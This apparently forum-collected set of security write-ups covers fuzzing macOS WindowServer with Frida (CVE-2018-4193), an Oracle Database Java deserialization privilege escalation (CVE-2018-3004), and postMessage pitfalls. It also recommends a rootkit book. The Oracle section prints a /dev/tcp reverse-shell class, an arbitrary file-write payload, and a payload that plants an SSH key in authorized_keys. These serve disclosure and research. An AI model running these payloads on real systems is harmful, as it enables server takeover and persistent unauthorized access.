The three dispatch subsystems make for an ideal place to fuzz the WindowServer in-process using dynamic binary instrumentation (DBI). They represent a generic ‘last hop’ for incoming data before it is delivered to any of the ~600 individual message handlers.

Without having to reverse engineer any of these surface level functions or their unique message formats (input), we had discovered a low-cost avenue to begin automated vulnerability discovery. By instrumenting these chokepoints, we could fuzz all incoming WindowServer traffic that can be generated through normal user interaction with the system.

In-process Fuzzing With Frida

Frida is a DBI framework that injects a JavaScript interpreter into a target process, enabling blackbox instrumentation via user provided scripts. This may sound like a bizarre use of JavaScript, but this model allows for rapid prototyping of near limitless binary introspection against compiled applications.

We started our Frida fuzzing script by defining a small table for the instructions we wished to hook at runtime. Each of these instructions was an indirect call (e.g., call rax) within the dispatch routines covered in the previous section.

    // instructions to hook (offset from base, reg w/ call target)
    var targets = [
        ['0x1B5CA2', 'rax'],    // WindowServer_subsystem
        ['0x2C58B',  'rcx'],    // Rendezvous_subsystem
        ['0x1B8103', 'rax']     // Services_subsystem
    ]

The JavaScript API provided by Frida is packed with functionality that allows one to snoop on or modify the process runtime. Using the Interceptor API, it is possible to hook individual instructions as a place to stop and introspect the process.
The basis for our hooking code is provided below:

    function InstallProbe(probe_address, target_register) {
        var probe = Interceptor.attach(probe_address, function(args) {
            var input_msg  = args[0]; // rdi (the incoming mach_msg)
            var output_msg = args[1]; // rsi (the response mach_msg)

            // extract the call target & its symbol name (_X...)
            var call_target = this.context[target_register];
            var call_target_name = DebugSymbol.fromAddress(call_target);

            // ready to read / modify / replay
            console.log('[+] Message received for ' + call_target_name);

            // ...
        });
        return probe;
    }

To hook the instructions we defined earlier, we first resolved the base address of the private SkyLight framework that they reside in. We are then able to compute the virtual addresses of the target instructions at runtime using the module base + offset. After that it is as simple as installing the interceptors on these addresses:

    // locate the runtime address of the SkyLight framework
    var skylight = Module.findBaseAddress('SkyLight');
    console.log('[*] SkyLight @ ' + skylight);

    // hook the target instructions
    for (var i in targets) {
        var hook_address = ptr(skylight).add(targets[i][0]); // base + offset
        InstallProbe(hook_address, targets[i][1]);
        console.log('[+] Hooked dispatch @ ' + hook_address);
    }

During the installed message intercept, we now had the ability to record, modify, or replay mach message contents just before they are passed into their underlying message handler (an _X... function). This effectively allowed us to man-in-the-middle any mach traffic to these MIG subsystems and dump their contents at runtime:

[Figure: Using Frida to sniff incoming mach messages received by the WindowServer]

From this point, our fuzzing strategy was simple. We used our hooks to flip random bits (dumb fuzzing) on any incoming messages received by the WindowServer. Simultaneously, we recorded the bitflips injected by our fuzzer to create ‘replay’ log files.
Replaying the recorded bitflips in a fresh instance of WindowServer gave us some degree of reproducibility for any crashes produced by our fuzzer. The ability to consistently reproduce a crash is priceless when trying to identify the underlying bug. A sample snippet of a bitflip replay log looked like the following:

    ...
    {"msgh_bits":"0x1100","msgh_id":"0x7235","buffer":"000000001100000001f65342","flip_offset":[4],"flip_mask":[16]}
    {"msgh_bits":"0x1100","msgh_id":"0x723b","buffer":"00000000010000000900000038a1b63e00000000"}
    {"msgh_bits":"0x80001112","msgh_id":"0x732f","buffer":"0000008002000000ffffff7f","ool_bits":"0x1000101","desc_count":1}
    {"msgh_bits":"0x1100","msgh_id":"0x723b","buffer":"00000000010000000900000070f3a53e00000000","flip_offset":[12],"flip_mask":[2]}
    {"msgh_bits":"0x80001100","msgh_id":"0x722a","buffer":"0000008002000000dfffff7f","ool_bits":"0x1000101","desc_count":1,"flip_offset":[8],"flip_mask":[32]}
    ...

In order for the fuzzer to be effective, the final step required us to stimulate the system to generate WindowServer message ‘traffic’. This could have been accomplished in any number of ways, such as letting a user navigate around the system, or writing scripts to randomly open applications and move them around.

But through careful study of pop culture and past vulnerabilities, we decided to simply place a weight on the ‘Enter’ key:

[Figure: 'Advanced Persistent Threat']

On the macOS lockscreen, holding ‘Enter’ happens to generate a reasonable variety of message traffic to the WindowServer. When a crash occurred as a result of our bitflipping, we saved the replay log and crash state to disk.

Conveniently, when WindowServer crashes, macOS locks the machine and restarts the service… bringing us back to the lockscreen. A simple Python script running in the background sees the new WindowServer instance pop up and injects Frida to start the next round of fuzzing.
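The flip-and-record idea described above can be sketched in a few lines of plain JavaScript. This is a hedged illustration, not the authors' fuzzer: the helper names `flipRandomBit` and `replayFlips` are hypothetical, the record only borrows the `flip_offset` and `flip_mask` field names from the sample log, and a real Frida probe would read and write the message through process memory rather than a `Uint8Array`.

```javascript
// Flip one randomly chosen bit of `bytes` (a Uint8Array) in place and return
// a record of the flip. `random` is injectable so a run can be made deterministic.
function flipRandomBit(bytes, random = Math.random) {
  const offset = Math.floor(random() * bytes.length); // which byte to corrupt
  const mask = 1 << Math.floor(random() * 8);         // which bit within that byte
  bytes[offset] ^= mask;
  return { flip_offset: [offset], flip_mask: [mask] };
}

// Re-apply previously recorded flips to an unmodified copy of the message.
function replayFlips(bytes, record) {
  record.flip_offset.forEach((offset, i) => {
    bytes[offset] ^= record.flip_mask[i];
  });
  return bytes;
}

// A made-up 8-byte message body, used only for demonstration.
const original = Uint8Array.from([0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00]);

const fuzzed = Uint8Array.from(original);
const record = flipRandomBit(fuzzed);
console.log("logged flip:", JSON.stringify(record));

// Replaying the log against a fresh copy reproduces the fuzzed message exactly.
const replayed = replayFlips(Uint8Array.from(original), record);
console.log("replay matches:", replayed.every((b, i) => b === fuzzed[i]));
```

Because XOR is its own inverse, the same record can also be applied a second time to restore the original bytes, which is handy when minimizing a crashing input.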
This was the lowest-effort and lowest-cost fuzzer we could have made for this target, yet it still proved fruitful.

Discovery & Root Cause Analysis

Leaving the fuzzer to run overnight, it produced a number of unique (mostly useless) crashes. Among the handful of more interesting crashes was one that looked particularly promising but would require additional investigation.

We replayed the bitflip log for that crash against a new instance of WindowServer with lldb (the default macOS debugger) attached and were able to reproduce the issue. The crashing instruction and register state depicted what looked like an Out-of-Bounds Read:

    Process 77180 stopped
    * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (address=0x7fd68940f7d8)
        frame #0: 0x00007fff55c6f677 SkyLight`_CGXRegisterForKey + 214
    SkyLight`_CGXRegisterForKey:
    ->  0x7fff55c6f677 <+214>: mov    rax, qword ptr [rcx + 8*r13 + 0x8]
        0x7fff55c6f67c <+219>: test   rax, rax
        0x7fff55c6f67f <+222>: je     0x7fff55c6f6e9            ; <+328>
        0x7fff55c6f681 <+224>: xor    ecx, ecx
    Target 0: (WindowServer) stopped.

In the crashing context, r13 appeared to be totally invalid (very large).

Another attractive component of this crash was its proximity to a top-level _X... function. The shallow nature of this crash implied that we would likely have direct control over the malformed field that caused the crash.
    (lldb) bt
    * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (address=0x7fd68940f7d8)
      * frame #0: 0x00007fff55c6f677 SkyLight`_CGXRegisterForKey + 214
        frame #1: 0x00007fff55c28fae SkyLight`_XRegisterForKey + 40
        frame #2: 0x00007ffee2577232
        frame #3: 0x00007fff55df7a57 SkyLight`CGXHandleMessage + 107
        frame #4: 0x00007fff55da43bf SkyLight`connectionHandler + 212
        frame #5: 0x00007fff55e37f21 SkyLight`post_port_data + 235
        frame #6: 0x00007fff55e37bfd SkyLight`run_one_server_pass + 949
        frame #7: 0x00007fff55e377d3 SkyLight`CGXRunOneServicesPass + 460
        frame #8: 0x00007fff55e382b9 SkyLight`SLXServer + 832
        frame #9: 0x0000000109682dde WindowServer`_mh_execute_header + 3550
        frame #10: 0x00007fff5bc38115 libdyld.dylib`start + 1
        frame #11: 0x00007fff5bc38115 libdyld.dylib`start + 1

Root cause analysis to identify the bug responsible for this crash took only minutes. Directly prior to the crash was a signed/unsigned comparison issue within _CGXRegisterForKey(...):

[Figure: Signed Comparison vulnerability in WindowServer]

WindowServer tries to ensure that the user-controlled index parameter is six or less. However, this check is implemented as a signed-integer comparison. This means that supplying a negative number of any size (e.g., -100000) will incorrectly get us past the check.

Our ‘fuzzed’ index was a 32-bit field in the mach message for _XRegisterForKey(...).
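The signed-comparison flaw described above is easy to reproduce in miniature. The sketch below is an illustration only: `MAX_INDEX`, `signedCheck` and `unsignedCheck` are hypothetical names, the bound of six comes from the text, and the unsigned variant is one common way to close this class of bug, not a claim about how Apple patched it.

```javascript
const MAX_INDEX = 6; // upper bound described in the text

// Reinterpret a number as a signed 32-bit integer, as a C `int` would hold it.
const asInt32 = (value) => value | 0;
// Reinterpret the same 32 bits as unsigned, as a C `unsigned int` would.
const asUint32 = (value) => value >>> 0;

// Flawed check: only an upper bound, evaluated as a signed comparison,
// so every negative index is accepted.
function signedCheck(rawIndex) {
  return asInt32(rawIndex) <= MAX_INDEX;
}

// Unsigned comparison: a negative value becomes a huge positive one
// and is rejected by the same upper bound.
function unsignedCheck(rawIndex) {
  return asUint32(rawIndex) <= MAX_INDEX;
}

for (const index of [5, 7, -100000]) {
  console.log(index, "signed:", signedCheck(index), "unsigned:", unsignedCheck(index));
}
```

Both checks agree on 5 and 7; only the unsigned one rejects -100000, because the same bit pattern read as unsigned is 4294867296.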
The bit our fuzzer flipped happened to be the uppermost bit, changing the number to a massive negative value:

            HEX        | BINARY                           | DECIMAL
            -----------+----------------------------------+------------
    BEFORE: 0x00000005 | 00000000000000000000000000000101 | 5
    AFTER:  0x80000005 | 10000000000000000000000000000101 | -2147483643
                         ^
                         |- Corrupted bit

Assuming we can get the currently crashing read to succeed through careful indexing to valid memory, there are a few minor constraints between us and what looks like an exploitable write later in the function:

[Figure: A write of unknown values (r15, ecx) can occur at the attacker controlled Out-of-Bounds index]

Under the right conditions, this bug appears to be an Out-of-Bounds Write! Any vulnerability that allows for memory corruption (a write) is generally categorized as an exploitable condition (until proven otherwise). This vulnerability has since been fixed as CVE-2018-4193.

In the next post, we provide a standalone PoC to trigger this crash and detail the constraints that make this bug rather difficult to exploit while developing our full Safari sandbox escape exploit against the WindowServer.

Conclusion

Escaping a software sandbox is a necessary step towards total system compromise when exploiting modern browsers. We used this post to discuss the value of sandboxing technology, the standard methodology to escape one, and our approach towards evaluating the Safari sandbox for a means of escaping it.

By reviewing existing resources, we devised a strategy to tackle the Safari sandbox and fuzz a historically problematic component (WindowServer) with a very simple in-process fuzzer. Our process demonstrates nothing novel, but it shows that even contrived fuzzers are still able to find critical, real-world bugs.

Source: http://blog.ret2.io/2018/07/25/pwn2own-2018-safari-sandbox/
1 point
-
Wednesday, July 18, 2018
Oracle Privilege Escalation via Deserialization

TLDR: Oracle Database is vulnerable to user privilege escalation via a Java deserialization vector that bypasses built-in Oracle JVM security. Proper exploitation can allow an attacker to gain shell level access on the server and SYS level access to the database. Oracle has opened CVE-2018-3004 for this issue.

Deserialization Vulnerabilities

Java deserialization vulnerabilities have been all the rage for the past few years. In 2015, Foxglove Security published an article detailing a critical security vulnerability in many J2EE application servers which left servers vulnerable to remote code execution. There have been a number of published exploits relying on Java deserialization since the 2015 Foxglove article, many based on the ysoserial library. There have also been a number of CVEs opened, and patches issued to resolve these defects, including Oracle-specific CVEs such as CVE-2018-2628, CVE-2017-10271 and CVE-2015-4852.

The majority of the published exploits focus on application servers vulnerable to deserialization attacks. Today, however, I would like to explore Oracle Database and how it is vulnerable to a custom deserialization attack based on the tight integration of Java via Java Stored Procedures in Oracle Database. The examples in this post were created using Oracle 12c; however, earlier versions of Oracle Database are also vulnerable.

Java Stored Procedures

Oracle Enterprise Edition has a Java Virtual Machine embedded into the database, and Oracle Database supports native execution of Java via Java Stored Procedures.
    create function get_java_property(prop in varchar2) return varchar2
       is language java name 'java.lang.System.getProperty(java.lang.String) return java.lang.String';
    /

Basic JVM Protections

Of course, if you have some level of familiarity with Java and penetration testing, you may immediately leap to the notion of creating a reverse shell compiled within Oracle Database:

    SET scan off

    create or replace and compile java source named ReverseShell as
    import java.io.*;
    public class ReverseShell{
       public static void getConnection(String ip, String port) throws InterruptedException, IOException{
          Runtime r = Runtime.getRuntime();
          Process p = r.exec(new String[]{"/bin/bash","-c","0<&126-;exec 126<>/dev/tcp/" + ip + "/" + port + ";/bin/bash <&126 >&126 2>&126"});
          System.out.println(p.toString());
          p.waitFor();
       }
    }
    /

    create or replace procedure reverse_shell (p_ip IN VARCHAR2,p_port IN VARCHAR2)
    IS language java name 'ReverseShell.getConnection(java.lang.String, java.lang.String)';
    /

This approach will not work, as the Oracle JVM implements fine-grained, policy-based security to control access to the OS and filesystem. Executing this procedure from a low-permissioned account results in errors. Note that the error stack contains the missing permission and the command necessary to grant the access:

    ORA-29532: Java call terminated by uncaught Java exception:
    java.security.AccessControlException: the Permission (java.io.FilePermission /bin/bash execute) has not been granted to TESTER. The PL/SQL to grant this is dbms_java.grant_permission( 'TESTER', 'SYS:java.io.FilePermission','/bin/bash', 'execute' )

There have been previously reported methods to bypass the built-in Java permissions, which will not be discussed in this post. Instead I am going to demonstrate a new approach to bypassing these permissions via XML deserialization.
XML Deserialization

XML serialization and deserialization exist in Java to support cross-platform information exchange using a standardized industry format (in this case XML). To this end, the java.beans library contains two classes, XMLEncoder and XMLDecoder, which are used to serialize a Java object into an XML format and, at a later time, deserialize the object.

Typical deserialization vulnerabilities rely on the existence of a service that accepts and deserializes arbitrary input. However, if you have access to a low-privileged Oracle account that can create objects in the user schema (i.e., a user with connect and resource) you can create your own vulnerable deserialization procedure.

As the "TESTER" user, I have created the following Java class "DecodeMe" and a Java Stored Procedure that invokes this class:

    create or replace and compile java source named DecodeMe as
    import java.io.*;
    import java.beans.*;
    public class DecodeMe{
       public static void input(String xml) throws InterruptedException, IOException {
          XMLDecoder decoder = new XMLDecoder ( new ByteArrayInputStream(xml.getBytes()));
          Object object = decoder.readObject();
          System.out.println(object.toString());
          decoder.close();
       }
    }
    ;
    /

    CREATE OR REPLACE PROCEDURE decodeme (p_xml IN VARCHAR2)
    IS language java name 'DecodeMe.input(java.lang.String)';
    /

The decodeme procedure will accept an arbitrary string of XML-encoded Java and execute the provided instructions. Information on the proper format for the serialized XML can be found here. This block will simply call println to output data to the terminal.
    BEGIN
       decodeme('<?xml version="1.0" encoding="UTF-8" ?>
       <java version="1.4.0" class="java.beans.XMLDecoder">
          <object class="java.lang.System" field="out">
             <void method="println">
                <string>This is test output to the console</string>
             </void>
          </object>
       </java>');
    END;
    /

The Vulnerability

Of course we don't need a deserialization process to print output to the console, so how exactly is this process vulnerable? It turns out that the deserialization process bypasses JVM permission settings and allows a user to arbitrarily write to files on the OS. See the following example script:

    BEGIN
       decodeme('
       <java class="java.beans.XMLDecoder" version="1.4.0" >
          <object class="java.io.FileWriter">
             <string>/tmp/PleaseDoNotWork.txt </string>
             <boolean>True</boolean>
             <void method="write">
                <string>Why for the love of god?</string>
             </void>
             <void method="close" />
          </object>
       </java>');
    END;
    /

Executing this anonymous block creates a file named "PleaseDoNotWork.txt" in the /tmp folder. Therefore, via deserialization, we can write arbitrary files to the file system, bypassing the built-in security restrictions.

Exploitation

As it turns out, we can not only write new files to the system, we can also overwrite or append to any file on which the Oracle user has write permissions. Clearly this has severe ramifications for the database, as an attacker could overwrite critical files, including control files, which could result in a successful Denial of Service attack or data corruption.

However, with a carefully crafted payload, we can use this deserialization attack to gain access to the server as the Oracle user. Assuming SSH is open on the server and configured to accept RSA key authentication, the following payload will append an RSA public key to the authorized_keys file of the Oracle account that manages the database processes.
    BEGIN
       decodeme('
       <java class="java.beans.XMLDecoder" version="1.4.0">
          <object class="java.io.FileWriter">
             <string>/home/oracle/.ssh/authorized_keys</string>
             <boolean>True</boolean>
             <void method="write">
                <string>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCedKQPeoJ1UeJEW6ZVkiuWAxBKW8F4fc0VrWxR5HEgaAcVodhgc6X7klyOWrJceGqICcCZd6K+/lvI3xaE2scJpRZWlcJQNCoZMRfmlhibq9IWMH0dm5LqL3QMqrXzZ+a2dfNohSdSmLDTaFHkzOGKEQIwHCv/e4e/eKnm0fUWHeL0k4KuCn3MQUN1HwoqoCciR0DrBDOYAKHxqpBv9rDneCdvaS+tqlr5eShjNlHv1YzJGb0lZZlsny19is8CkhcZ6+O+UCKoBPrxaGsfipsEIH5aPu9xVA90Xgsakhg4yoy9FLnES+xmnVxKX5GHyixi3qeWGDwBsAvhAAGLxOc5 </string>
             </void>
             <void method="close" />
          </object>
       </java>
       ');
    END;
    /

When executed, the code will append an arbitrary RSA key to the Oracle user's authorized_keys file, granting an attacker SSH access as the Oracle user. The Oracle user can access the database as SYS, so the attacker has effectively compromised the entire database.

Impact

As Oracle Database has a high per-instance cost, many production architectures rely on a shared-tenant model, where multiple mission applications leverage the same database, and application support users share access to the same system. Furthermore, Oracle Exadata implementations often host multiple database instances on the same servers. If a low-privileged user, perhaps a tier-III support admin for a specific application, were to deploy this exploit, they could effectively gain access to the data and applications supporting an entire enterprise.

Conclusion

As we can see, the deserialization design pattern implemented in Java continues to create a myriad of vulnerabilities. Security analysts should look beyond J2EE-based deserialization attacks and consider attack vectors based on other embedded implementations.

Reporting Timeline

This issue was first reported to Oracle Support in January 2018, and was addressed in the July 2018 CPU released on July 17th, 2018.
Update: Navigating the intricacies of Oracle patches can be quite the challenge. The Oracle bug for this vulnerability is Bug 27923353, and the patch is for the OJVM system. For this POC, the proper patch is OJVM release update 12.2.0.1.180717 (p27923353_122010_Linux-x86-64.zip).

Source: http://obtruse.syfrtext.com/2018/07/oracle-privilege-escalation-via.html
1 point
-
The pitfalls of postMessage
December 8, 2016

The postMessage API is an alternative to JSONP, XHR with CORS headers and other methods enabling sending data between origins. It was introduced with HTML5 and, like many other cross-document features, it can be a source of client-side vulnerabilities.

How it works

To send a message, an application simply calls the "postMessage" function on the target window it would like to send the message to:

    targetWindow.postMessage("hello other document!", "*");

And to receive a message, a “message” event handler can be registered on the receiving end:

    window.addEventListener("message", function(message){console.log(message.data)});

Pitfall 1

The first pitfall lies in the second argument of the “postMessage” function. This argument specifies which origin is allowed to receive the message. Using the wildcard “*” means that any origin is allowed to receive the message.

Since the target window is located at a different origin, there is no way for the sender window to know if the target window is at the target origin when sending the message. If the target window has been navigated to another origin, the other origin would receive the data.

Pitfall 2

The second pitfall lies on the receiving end. Since the listener listens for any message, an attacker could trick the application by sending a message from the attacker’s origin, which would make the receiver think it received the message from the sender’s window. To avoid this, the receiver must validate the origin of the message with the “message.origin” attribute.

If a regex is used to validate the origin, it’s important to escape the “.” character, since this code:

    //Listener on http://www.examplereceiver.com/
    window.addEventListener("message", function(message){
        if(/^http:\/\/www.examplesender.com$/.test(message.origin)){
            console.log(message.data);
        }
    });

would not only allow messages from “www.examplesender.com“, but also “wwwaexamplesender.com“, “wwwbexamplesender.com” etc.
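To make Pitfall 2 concrete, the sketch below compares the unescaped-dot regex with an exact-match allowlist. It runs outside a browser and never touches `window`; the `trustedOrigins` set and the `isTrustedOrigin` helper are hypothetical names, and an exact string comparison is offered as one simple alternative to a regex, not as the only correct approach.

```javascript
// The flawed pattern from the example: the unescaped "." matches any character.
const looseOrigin = /^http:\/\/www.examplesender.com$/;

// Exact comparison against a list of trusted origins leaves no room for
// regex mistakes. In a real listener the argument would be message.origin.
const trustedOrigins = new Set(["http://www.examplesender.com"]);

function isTrustedOrigin(origin) {
  return trustedOrigins.has(origin);
}

for (const origin of [
  "http://www.examplesender.com",
  "http://wwwaexamplesender.com",
  "http://www.examplesender.com.evil.example",
]) {
  console.log(origin, "regex:", looseOrigin.test(origin), "allowlist:", isTrustedOrigin(origin));
}
```

The second origin slips past the regex because "a" satisfies the unescaped dot, while the allowlist accepts only the first origin.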
Pitfall 3

The third pitfall is DOM XSS, caused by using the message in a way that the application treats it as HTML/script, for example:

    //Listener on http://www.examplereceiver.com/
    window.addEventListener("message", function(message){
        if(/^http:\/\/www\.examplesender\.com$/.test(message.origin)){
            document.getElementById("message").innerHTML = message.data;
        }
    });

DOM XSS isn’t postMessage specific, but it’s something that’s present in many postMessage implementations. One reason for this could be that the receiving application expects the data to be formatted correctly, since it’s only listening for messages from http://www.examplesender.com/.

But what if an attacker finds an XSS bug on http://www.examplesender.com/? That would mean that they could XSS http://www.examplereceiver.com/ as well.

Not using postMessage?

You might be thinking “our application doesn’t use postMessage so these issues don’t apply to us”. Well, a lot of third party scripts use postMessage to communicate with the third party service, so your application might be using postMessage without your knowledge.

You can check if a page has a registered message listener (and which script registered it) by using Chrome Devtools, under Sources -> Global Listeners.

Some third party scripts fall into these pitfalls. In the next post I will describe a postMessage vulnerability that caused XSS on over a million websites, and the technique I used to find it.

References

https://seclab.stanford.edu/websec/frames/post-message.pdf
https://www.w3.org/TR/webmessaging/
http://caniuse.com/#feat=x-doc-messaging

Author: Mathias Karlsson, Security Researcher, @avlidienbrunn

Source: https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/
1 point
-
A brilliant book. The thread was worth digging up. It pisses all over the "operating systems" course from university.

Bill Blunden, The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System

http://index-of.es/Magazines/hakin9/

The book is among the resources at the link above.

Amazon description: With the growing prevalence of the Internet, rootkit technology has taken center stage in the battle between White Hats and Black Hats. Adopting an approach that favors full disclosure, The Rootkit Arsenal presents the most accessible, timely, and complete coverage of rootkit technology. This book covers more topics, in greater depth, than any other currently available. In doing so, the author forges through the murky back alleys of the Internet, shedding light on material that has traditionally been poorly documented, partially documented, or intentionally undocumented.
1 point
-
1 point
-
1 point